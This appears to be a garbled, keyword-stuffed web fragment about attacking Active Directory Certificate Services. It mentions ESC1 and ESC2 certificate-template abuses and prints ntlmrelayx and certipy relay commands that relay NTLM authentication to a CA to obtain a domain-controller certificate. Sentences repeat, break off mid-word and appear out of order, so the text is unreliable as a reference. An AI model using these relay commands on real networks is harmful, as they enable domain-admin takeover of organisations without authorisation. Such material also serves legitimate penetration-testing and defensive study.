Hacktricks Adcs 2021 File

: Modify template to enable ESC1 conditions (e.g., allow SAN supply), then request as ESC1.

: Immediate domain admin access via Kerberos authentication. ESC2 – Certificate Template Allows Any EKU Condition : Template defines Any Purpose EKU (2.5.29.37.0) and allows low-priv enrollment. hacktricks adcs

# Relay NTLM auth from a compromised host to ADCS ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy relay -target http://ca.contoso.com -template DomainController : Modify template to enable ESC1 conditions (e